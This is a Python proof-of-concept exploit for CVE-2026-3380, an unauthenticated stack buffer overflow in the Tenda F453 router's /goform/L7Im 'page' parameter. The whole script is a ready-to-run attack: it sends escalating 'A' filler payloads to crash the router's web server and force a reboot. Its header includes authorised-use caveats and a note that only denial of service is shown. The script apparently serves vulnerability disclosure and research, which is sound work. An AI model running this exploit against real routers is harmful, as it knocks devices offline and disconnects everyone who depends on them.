#!/usr/bin/env python3
# Exploit Title: Tenda F453 frmL7ImForm Buffer Overflow
# CVE: CVE-2026-3380
# Date: 2026-03-01
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub:
# Vendor Homepage: https://www.tenda.com.cn/
# Software Link:
# Affected: Tenda F453 v1.0.0.3
# Tested on: Tenda F453 v1.0.0.3
# Category: Remote
# Platform: Embedded (Linux-based router)
# Exploit Type: Denial of Service / Buffer Overflow
# CVSS: 8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Description: Stack-based buffer overflow in /goform/L7Im via the 'page' parameter
# due to unsafe use of sprintf/strcpy in frmL7ImForm function.
# NOTE: the vector above rates confidentiality/integrity impact as High, but this
# PoC only demonstrates the availability impact (httpd crash / reboot): it sends
# plain 'A' filler and makes no attempt at control-flow hijack or code execution.
# Fixed in:
# Usage:
# python3 exploit.py <target_ip> [size]
#
# Examples:
# python3 exploit.py 192.168.0.1
# python3 exploit.py 192.168.1.1 2300
#
# Options:
# -- (no additional options implemented)
#
# Notes:
# • For authorized testing / research purposes only
# • Most likely causes httpd crash → device reboot (DoS). The reboot drops every
#   client on the router, so do not run this against a device others depend on.
# • A timeout or connection error is only an indicator, not proof of a crash:
#   confirm out-of-band (e.g. the web UI / a ping to the LAN IP goes away and
#   comes back) before reporting the result.
# • Unauthenticated in affected firmware version — the request carries no
#   session cookie or credential.
#
# How to Use
#
# Step 1:
# Connect to the same network as the target router
#
# Step 2:
# Run the script with the router's LAN IP address
#
# ────────────────────────────────────────────────
import sys
import requests
import urllib.parse
import time
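def trigger_overflow(target, size=2048):
    """Send one oversized ``page`` value to ``/goform/L7Im`` and report the outcome.

    The request is a plain form POST: ``page`` is ``size`` bytes of ``'A'``
    plus the ``module``/``action`` fields the endpoint expects. No session
    cookie or credential is sent. The payload is untargeted filler, so the
    only outcome this can demonstrate is the httpd crash / reboot described
    in the file header, not code execution.

    Args:
        target: router LAN IP or hostname. It is interpolated straight into
            the URL and the Referer, so pass a bare host, not a URL.
        size: number of filler bytes placed in ``page``.

    Returns:
        A short status string so a caller can stop once the target is down:
        ``"response"`` (httpd answered), ``"timeout"`` (no answer within the
        request timeout), ``"unreachable"`` (connection refused/reset, which
        is consistent with httpd dying or the device rebooting) or
        ``"error"`` (anything else). Earlier versions returned ``None``;
        callers that ignore the value are unaffected.
    """
    url = f"http://{target}/goform/L7Im"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"http://{target}/",
        "Connection": "close",
    }
    overflow = "A" * size
    body = urllib.parse.urlencode({
        "page": overflow,
        "module": "L7Im",
        "action": "apply",
    })

    print(f"[*] Sending to {url}")
    print(f"    Payload length : {len(overflow)} bytes")
    try:
        # allow_redirects=False: a 302 from the handler is reported as-is
        # instead of being followed to a page unrelated to the bug.
        # The URL is plain http, so no TLS option belongs here; the old
        # verify=False was a no-op that would only have silently disabled
        # certificate checks if the scheme were ever changed to https.
        r = requests.post(
            url,
            data=body,
            headers=headers,
            timeout=6,
            allow_redirects=False,
        )
    except requests.exceptions.Timeout:
        print("[!] TIMEOUT → very likely crashed / httpd died")
        return "timeout"
    except requests.exceptions.ConnectionError as e:
        print(f"[!] ConnectionError: {e} → device probably rebooted")
        return "unreachable"
    except Exception as e:  # best-effort tool: report and let the caller decide
        print(f"[!] Unexpected error: {e}")
        return "error"

    print(f"[+] Got response → HTTP {r.status_code}")
    print(f"    Content-Length: {len(r.content)} bytes")
    return "response"


# Default filler size and the escalation steps added to it on each attempt.
DEFAULT_SIZE = 2048
SIZE_STEPS = (0, 512, 1024)
# Statuses from trigger_overflow() that indicate the target is (probably) down.
_DOWN_STATES = ("timeout", "unreachable")


def main(argv=None):
    """CLI entry point: parse ``<target_ip> [size]`` and run the escalation loop.

    Sends the payload at ``size``, ``size + 512`` and ``size + 1024`` bytes,
    two seconds apart, and stops as soon as one attempt looks like it took
    the target down. Stopping early avoids hammering a rebooting device and
    keeps later connection errors from being misreported as fresh reboots.
    (A device that is merely slow to answer within the 6 s timeout also stops
    the loop; re-run with a larger starting size if that happens.)

    Args:
        argv: arguments without the program name; defaults to ``sys.argv[1:]``.
            Extra positional arguments beyond the second are ignored, as before.

    Returns:
        Process exit status: 1 on a usage error, 0 otherwise.
    """
    args = sys.argv[1:] if argv is None else list(argv)
    if not args:
        print("Usage: python3 exploit.py <target_ip> [size]")
        print("Example: python3 exploit.py 192.168.0.1 2300")
        return 1

    target_ip = args[0].strip()
    # The target is spliced directly into the URL; reject anything that is
    # not a bare host so a pasted URL cannot quietly change the request path.
    if not target_ip or "/" in target_ip:
        print("[!] <target_ip> must be a bare IP address or hostname, not a URL")
        return 1

    try:
        payload_size = int(args[1]) if len(args) > 1 else DEFAULT_SIZE
    except ValueError:
        print(f"[!] size must be an integer, got {args[1]!r}")
        return 1
    if payload_size < 1:
        print("[!] size must be a positive number of bytes")
        return 1

    print("[+] CVE-2026-3380 Exploit - Tenda F453 /goform/L7Im")
    print(f"    Target: {target_ip}")
    print(f"    Size  : {payload_size} bytes\n")

    sizes = [payload_size + step for step in SIZE_STEPS]
    for attempt, sz in enumerate(sizes, start=1):
        print(f"\n─── Trying size = {sz} ───")
        status = trigger_overflow(target_ip, sz)
        if status in _DOWN_STATES:
            print("[*] Target stopped answering — no further payloads sent. "
                  "Confirm the crash out-of-band and wait for the device to come back.")
            break
        if attempt < len(sizes):
            time.sleep(2)  # give httpd a moment between attempts
    return 0


if __name__ == "__main__":
    sys.exit(main())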